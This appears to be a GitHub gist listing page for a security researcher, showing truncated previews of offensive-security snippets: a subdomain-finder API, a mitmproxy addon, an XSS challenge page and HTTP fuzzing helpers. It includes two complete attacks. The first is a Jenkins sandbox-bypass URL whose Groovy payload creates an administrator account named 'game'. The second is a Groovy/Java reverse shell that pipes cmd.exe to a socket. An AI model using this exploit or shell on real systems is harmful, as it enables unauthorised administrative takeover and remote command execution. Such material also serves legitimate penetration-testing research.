This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Usage: | |
| go get github.com/Ice3man543/subfinder | |
| go get github.com/gin-gonic/gin | |
| go get github.com/jinzhu/gorm | |
| go get github.com/mattn/go-sqlite3 | |
| go run api.go |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| from mitmproxy.options import Options | |
| from mitmproxy.proxy.config import ProxyConfig | |
| from mitmproxy.proxy.server import ProxyServer | |
| from mitmproxy.tools.dump import DumpMaster | |
| class Addon(object): | |
| def request(self, flow): |
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
akhil-reni
/ revsh.groovy
Created
July 27, 2019 08:31
— forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ipaddress | |
| import fileinput | |
| ips = [] | |
| for line in fileinput.input(): | |
| try: | |
| ips.extend(list(ipaddress.ip_network(line.strip()))) | |
| except: | |
| pass |
akhil-reni
/ gist:1eb4dd38549f81d0e108488e40e023ae
Last active
February 14, 2020 04:35
XSS challenge
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| function bindEvent(element, eventName, eventHandler) { | |
| if (element.addEventListener){ | |
| element.addEventListener(eventName, eventHandler, false); | |
| } else if (element.attachEvent) { | |
| element.attachEvent('on' + eventName, eventHandler); | |
| } | |
| } | |
| bindEvent(window, 'message', function (e) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from __future__ import absolute_import, unicode_literals | |
| from http.server import BaseHTTPRequestHandler | |
| from io import BytesIO | |
| from urllib import parse | |
| class Request: | |
| def __init__(self): | |
| self.headers = None |
akhil-reni
/ create_insertions.py
Created
April 26, 2020 16:31
Create insertion points in a HTTP raw request
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import copy | |
| class GetInsertionPoints: | |
| def __init__(self, request): | |
| self.request = request | |
| self.requests = [] | |
| self.params(append=True) | |
| self.body(append=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lxml import html | |
| import re | |
| class ContextAnalyzer: | |
| def __init__(self, response_text, search_string): | |
| self.get_contexts(response_text, search_string) | |
| @staticmethod |
OlderNewer